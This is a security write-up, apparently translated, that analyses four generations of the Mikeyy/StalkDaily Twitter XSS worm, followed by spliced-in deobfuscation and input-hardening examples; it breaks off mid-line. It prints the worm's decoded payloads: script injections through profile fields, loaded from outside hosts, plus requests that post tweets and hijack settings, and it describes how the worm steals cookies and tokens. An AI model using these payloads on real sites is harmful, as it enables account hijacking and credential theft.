The holes cannot all be patched, and Twitter gets hit by the worm a fifth time: the Mikeyy (StalkDaily) worm passes from generation to generation

Source: Internet
Author: User


Less than a day after the previous wave of Mikeyy worm attacks had subsided, the fourth generation of the Mikeyy worm appeared on Twitter last night. After an announcement on Twitter's official site and three hours of work, Twitter fixed the XSS (cross-site scripting) vulnerability and stopped the worm from spreading.
In that announcement Twitter first said: "We have heard from you and are also aware of the fourth generation; we are working on the problem." Three hours later it announced: "We believe the situation is under control. Thank you for your patience. We will continue to keep an eye on Mikeyy."

Yesterday's article ended with: "Twitter cannot find every program containing XSS vulnerabilities, and Mikeyy says this is not the end of it, so there will still be trouble to come." Unfortunately, the third and fourth (in fact the fifth) generations of the Mikeyy worm hit last night, causing another wave of chaos. TechCrunch covered it again (a security incident reported by TechCrunch two days in a row), and it believes this incident will deal a heavy blow to Twitter.

We have observed five versions of the Mikeyy (StalkDaily) worm, and the later versions also use a form of obfuscation. In this article we analyse the worm itself, generation by generation.

[First Generation Mikeyy (StalkDaily)]

Lines 8-80 of the first-generation worm send the user's page URL and cookie to mikeyylolz.uuuq.com, so the user's login credentials are captured:


This contradicts Mikeyy's claim that he did not steal user tokens. At this stage, the worm's JavaScript itself was hosted at a separate hxxp:// location from the one the stolen data was sent to.

The first generation exploited XSS injection points in profile fields such as url and location:

At this stage, infected accounts tweet one of the following messages:

randomUpdate[0]="Dude, www.StalkDaily.com is awesome. Whats the fuss?";
randomUpdate[1]="Join www.StalkDaily.com everyone!";
randomUpdate[2]="Woooo, www.StalkDaily.com :)";
randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
randomUpdate[4]="Wow...www.StalkDaily.com";
randomUpdate[5]="@twitter www.StalkDaily.com";

[Second Generation Mikeyy (StalkDaily)]

The second-generation worm is obfuscated and much harder to read. The original JavaScript begins like this:

var _0x8da4=["\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50",
"\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50",
"\x63\x6F\x6E\x6E\x65\x63\x74","\x74\x6F\x55\x70\x70\x65\x72\x43\x61\x73\x65",
"\x47\x45\x54","\x3F","\x6F\x70\x65\x6E","","\x4D\x65\x74\x68\x6F\x64",
"\x50\x4F\x53\x54\x20","\x20\x48\x54\x54\x50\x2F\x31\x2E\x31",
"\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72",
"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65",
"\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64",

Decoding the hex escapes in the string table, the first batch of strings and the start of the worm body read as follows:

var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase",
  "GET", "?", "open", "", "Method", "POST ", " HTTP/1.1", "setRequestHeader",
  "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange",
  "readyState", "send", "split", "join", "", "%27", "(", "%28", ")", "%29",
  "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML",
  "documentElement", "exec", "Twitter should really fix this... Mikeyy",
  "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy",
  "random", "length", "floor",
  "mikeyy:) \"></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ",
  "mikeyy:) \"></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ",
  "mikeyy:) \"></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%61%6d%62%61%6d%79%6f%2e%31%31%30%6d%62%2e%63%6f%6d%2f%77%6f%6d%70%77%6f%6d%70%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ",
  "/status/update", "POST", "authenticity_token=", "&status=",
  "&return_rendered_status=true&twttr=true", "/account/settings",
  "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++++!&user[url]=",
  "&tab=home&update=update", "/account/profile_settings",
  "&user[profile_default]=false&tab=none&profile_theme=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user[profile_link_color]=",
  "&commit=save+changes", "wait()"];

function XHConn() {
  var _0x6687x2, _0x6687x3 = false;
  try { _0x6687x2 = new ActiveXObject(_0xc26a[0x0]); }
  catch (e) {
    try { _0x6687x2 = new ActiveXObject(_0xc26a[0x1]); }
    catch (e) {
      try { _0x6687x2 = new XMLHttpRequest(); }
      catch (e) { _0x6687x2 = false; };
    };
  };
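The decoding step above can be automated. The following is an added example written for this article, not code from the worm or from the original post: it decodes the "\xNN" string table, rewrites the `_0xc26a[0x0]`-style references in the worm body into readable literals, and URL-decodes the `unescape(/.../.source)` containers to expose the injected script URLs, all without executing any of the worm's code. The sample inputs are constructed from the fragments printed above (the first four table entries, one line that indexes the table, and the first profile_link_color payload).

```javascript
// Added example (not code from the article or from the worm): a small
// deobfuscator for the two tricks the second-generation Mikeyy script uses,
// so the string table and payloads can be read without ever running them.
//   1. A string array written as "\x4D\x73..." hex escapes and referenced
//      from the worm body as _0xc26a[0x0], _0xc26a[0x1], ...
//   2. HTML smuggled through unescape(/%3c...%3e/.source): the "regex" is
//      only a container for a percent-encoded <script src=...> tag.
// The sample inputs below are constructed from fragments shown in the article.

// Decode "\xNN" escapes in the body of a JS string literal without eval().
function decodeHexEscapes(literal) {
  return literal.replace(/\\x([0-9A-Fa-f]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Parse `var _0xNAME=["...","..."];` into { name, items } with every item decoded.
// Handles only the double-quoted, comma-separated shape this obfuscator emits.
function parseStringArray(source) {
  const m = source.match(/var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[([\s\S]*?)\];/);
  if (!m) throw new Error("no obfuscated string array found");
  const items = [];
  const re = /"((?:[^"\\]|\\.)*)"/g;
  let s;
  while ((s = re.exec(m[2])) !== null) items.push(decodeHexEscapes(s[1]));
  return { name: m[1], items };
}

// Replace _0xNAME[0x12] / _0xNAME[18] references in the worm body with the
// decoded literal so the control flow reads like ordinary JavaScript.
function resolveArrayRefs(source, table) {
  const re = new RegExp(table.name + "\\[(0x[0-9a-fA-F]+|\\d+)\\]", "g");
  return source.replace(re, (_, idx) => JSON.stringify(table.items[Number(idx)]));
}

// Pull every external script URL hidden inside unescape(/.../.source) calls.
// Malformed percent-encoding is reported rather than thrown so one bad
// payload does not abort the whole pass.
function hiddenScriptSources(payload) {
  const urls = [];
  const re = /unescape\(\/([^\/]*)\/\.source\)/g;
  let m;
  while ((m = re.exec(payload)) !== null) {
    let html;
    try { html = decodeURIComponent(m[1]); }
    catch (e) { urls.push("<undecodable: " + m[1].slice(0, 16) + ">"); continue; }
    const src = html.match(/<script\s+src="([^"]+)"/i);
    if (src) urls.push(src[1]);
  }
  return urls;
}

// --- constructed samples -------------------------------------------------
// First four entries of the worm's string table, as printed in the article.
const OBFUSCATED_ARRAY =
  'var _0xc26a=["\\x4D\\x73\\x78\\x6D\\x6C\\x32\\x2E\\x58\\x4D\\x4C\\x48\\x54\\x54\\x50",' +
  '"\\x4D\\x69\\x63\\x72\\x6F\\x73\\x6F\\x66\\x74\\x2E\\x58\\x4D\\x4C\\x48\\x54\\x54\\x50",' +
  '"\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74","\\x47\\x45\\x54"];';

// A line of worm body that indexes into that table (constructed).
const WORM_FRAGMENT =
  'try{ x = new ActiveXObject(_0xc26a[0x0]); } catch(e){ x = new ActiveXObject(_0xc26a[0x1]); }';

// The first profile_link_color payload from the decoded table above.
const PAYLOAD = 'mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70' +
  '%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65' +
  '%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74' +
  '%3e/.source));</script> <a ';

function demo() {
  const table = parseStringArray(OBFUSCATED_ARRAY);
  return {
    strings: table.items,
    readable: resolveArrayRefs(WORM_FRAGMENT, table),
    scripts: hiddenScriptSources(PAYLOAD),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Everything here is plain string processing: the worm's own `unescape()` and `document.write()` are never called, which is the point when handling a sample that is still live on the network.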

By this time mikeyylolz.uuuq.com had been shut down, so the worm switched to hosting its script at content.ireel.com/xssjs.js and sending stolen data to hxxp://content.ireel.com/j.php. From the code above, infected accounts tweet the following messages:

"Twitter should really fix this... Mikeyy"
"I am done... Mikeyy"
"Mikeyy is done .."
"Twitter please fix this, regards Mikeyy"

We can also see that Mikeyy still steals user tokens and cookies, but that code has been moved into the wait() function. Note that because the injected script runs inside the victim's own Twitter session, it can read the page's authenticity_token (the table above contains "innerHTML", "exec" and "authenticity_token="), so the CSRF token offers no protection against an XSS worm posting on the victim's behalf.

In addition, the second generation starts attacking different XSS injection points, including the "profile_background_tile" and "profile_link_color" settings fields.
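To make the injection point concrete, here is an added example, not Twitter's code and not from the original article: a hypothetical profile renderer that splices the stored profile_link_color and url fields straight into markup, next to a hardened version that validates the colour against a strict hex allow-list, restricts the url to http(s), and HTML-escapes every field on output. The template shape (an `<a>` whose style carries the link colour) and the default colour are assumptions for illustration; the payload is the worm's profile_link_color value from the table above with the unescape() wrapper already decoded.

```javascript
// Added example (not Twitter's code, and not from the article): a hypothetical
// profile renderer that shows the bug class the second generation exploited,
// next to a hardened version. The template shape (an <a> whose style carries
// the profile link colour) is an assumption made for illustration only.

function htmlEscape(s) {
  return String(s).replace(/[&<>"']/g, c =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" })[c]);
}

// Vulnerable: stored profile fields are concatenated straight into markup.
// A value such as `mikeyy:) "></a><script ...` closes the attribute and the
// element, then injects its own <script> tag.
function renderProfileVulnerable(p) {
  return '<a href="' + p.url + '" style="color:#' + p.profile_link_color + '">' +
    p.name + '</a>';
}

// Hardened: a colour is six hex digits and nothing else, so validate against
// that allow-list and fall back to a default; a URL must parse and use
// http(s); every field is HTML-escaped at the point it is written out.
const HEX_COLOR = /^[0-9a-fA-F]{6}$/;
const DEFAULT_COLOR = "0084b4"; // assumed default, chosen for the example

function safeColor(value) {
  return HEX_COLOR.test(value) ? value.toLowerCase() : DEFAULT_COLOR;
}

function safeUrl(value) {
  try {
    const u = new URL(value);
    return (u.protocol === "http:" || u.protocol === "https:") ? u.href : "#";
  } catch (e) {
    return "#";
  }
}

function renderProfileHardened(p) {
  return '<a href="' + htmlEscape(safeUrl(p.url)) + '" style="color:#' +
    safeColor(p.profile_link_color) + '">' + htmlEscape(p.name) + '</a>';
}

// Check used below: does the rendered output contain a <script> element?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed sample: the worm's profile_link_color payload (with the
// unescape() wrapper already decoded), the Womp name and the StalkDaily url.
const WORM_PROFILE = {
  name: "Womp!",
  url: "http://www.StalkDaily.com",
  profile_link_color:
    'mikeyy:) "></a><script src="http://content.ireel.com/jsxss.js"></script> <a ',
};

// Constructed sample: an ordinary user whose values must survive unchanged.
const NORMAL_PROFILE = {
  name: "Alice <3",
  url: "https://example.com/alice",
  profile_link_color: "1F98C7",
};

console.log(renderProfileVulnerable(WORM_PROFILE));
console.log(renderProfileHardened(WORM_PROFILE));
console.log(renderProfileHardened(NORMAL_PROFILE));
```

The fix is not a blacklist of `<script`: the colour field simply has no legitimate value outside six hex digits, so anything else is rejected, and the remaining free-text fields are escaped for the HTML context they land in. A third generation changing its payload string would still hit the same validation.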

[Third generation Mikeyy (StalkDaily)]

The third generation is essentially the same as the second. The only change is that the credential-theft location "hxxp://omghax.uuuq.com" was also taken down, so the token and cookie exfiltration was switched to "hxxp://bambamyo.110mb.com/j.php" and the worm script is loaded from "hxxp://bambamyo.110mb.com/wompwomp.js".

What generations one to three have in common:
1. All of them steal user tokens and cookies

Where generations one, two and three differ:
1. The first generation is not obfuscated; the second and third are
2. The location hosting the JavaScript and the location the tokens/cookies are sent back to differ
3. The XSS injection points attacked differ
4. The harm caused differs

Twitter handled the first three generations on Sunday (Asia time) and fixed the XSS vulnerabilities they used.

[Generation 4 Mikeyy (StalkDaily)]

The fourth generation of the XSS worm launched on Monday evening (Asia time), through an XSS vulnerability Twitter had not yet fixed, and the worm quickly spread again. What is notable this time is that Mikeyy had already admitted to being the author and no longer hid: the malicious JavaScript was placed directly on his own "StalkDaily.com" website. The fourth-generation code:

randomXSS[0] = "><
